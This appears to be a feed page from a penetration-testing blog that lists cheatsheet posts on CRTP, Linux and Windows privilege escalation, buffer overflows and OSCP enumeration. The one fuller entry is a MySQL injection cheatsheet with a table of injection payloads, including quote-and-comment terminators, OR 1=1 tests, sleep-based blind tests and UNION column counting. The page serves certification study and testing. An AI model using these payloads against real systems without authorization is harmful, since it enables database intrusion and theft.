Cheatsheet on Welcome to noobsec

CRTP Cheatsheet

Wed, 23 Dec 2020 22:30:19 +0000

CRTP Cheatsheet

This cheatsheet corresponds to an older version of PowerView deliberately as this is the version that was used in Pentester Academys’ CRTP certification course. Updated AD enumeration (PowerView/SharpHound) cheatsheet can be found at AD Enumeration

Helpful Commands

Commands to help use PowerView even better.

MySQL Injection Cheatsheet

Wed, 29 Jul 2020 13:10:00 +0000

MySQL Injection cheatsheet

Testing checklist

Name	Character	Function
Single quote	`'`	String terminator
Semi colon	`;`	Query terminator
Comment	`-- -`	Removes the rest of the query
Comment	`#`	Removes the rest of the query
Comment	`/comment this/`	Can be placed anywhere in a query, used for bypassing weak filters
Single quote with a comment	`'-- -`	End a string and remove rest of the query
Single quote, semi colon and a comment	`';-- -`	End a string, end query, and remove rest of the query
OR operator	`OR 1=1-- -`	For integers, `true` test
OR operator	`OR 1=2-- -`	For integers, `false` test
OR operator	`' OR '1'='1'-- -`	For strings, `test` test
AND operator	`AND 1=1-- -`	For integers, `true` test
AND operator	`AND 1=2-- -`	For integers, `false` test
AND operator	`' AND '1'='1'-- -`	For strings, `true` test
Arithmetic	`?id=2-1`	For integers, arithmetic operation would load the resultant post
Sleep function	`OR sleep(5)-- -`	Blind test

Functions

Function	Description
`database()`	Get the name of the working database
`user()`	Get the name of the user operating on the working database
`version()`	MySQL version
`concat()`	Concatenate two or more strings per row
`group_concat()`	Concatenate all the strings in one row
`substring('string'/<column_name>,<offset>,<length>)`	Get a part of the value of a string or column
`ord()`	Convert the value to ordinal (decimal)

Number of Columns

Method	Description
`ORDER BY 3-- -`	For numbers. If column index provided exceeds the number of column present in the table, there will be an error
`' ORDER BY 3-- -`	For string. If column index provided exceeds the number of column present in the table, there will be an error
`UNION SELECT 1,2,3-- -`	For numbers. It will throw an error till right number of columns haven’t been “SELECT"ed

Database Contents

Works with UNION queries

Linux Privilege Escalation

Mon, 29 Jun 2020 16:33:08 +0000

Linux Privilege Escalation Cheatsheet

So you got a shell, what now? This cheatsheet will help you with local enumeration as well as escalate your privilege further

Usage of different enumeration scripts are encouraged, my favourite is LinPEAS Another linux enumeration script I personally use is LinEnum Abuse existing functionality of programs using GTFOBins

Buffer Overflow

Fri, 26 Jun 2020 18:32:04 +0000

Windows 32-Bit Buffer Overflow

SLMail Example

Practice these:

SLMail - download from exploit-db
Brainpan - download from vulnhub

Step By Step Scripts

All the scripts are available here as well as at the bottom.

Windows Privilege Escalation

Fri, 26 Jun 2020 18:05:42 +0000

Windows Privilege Escalation Cheatsheet

Latest updated as of: 12 / June / 2022

So you got a shell, what now?
This post will help you with local enumeration as well as escalate your privileges further.

Usage of different enumeration scripts and tools is encouraged, my favourite is WinPEAS. If confused which executable to use, use this

OSCP Cheatsheet

Thu, 25 Jun 2020 08:51:22 +0000

OSCP Cheatsheet

General Enumeration - Nmap

Replace $ip with target IP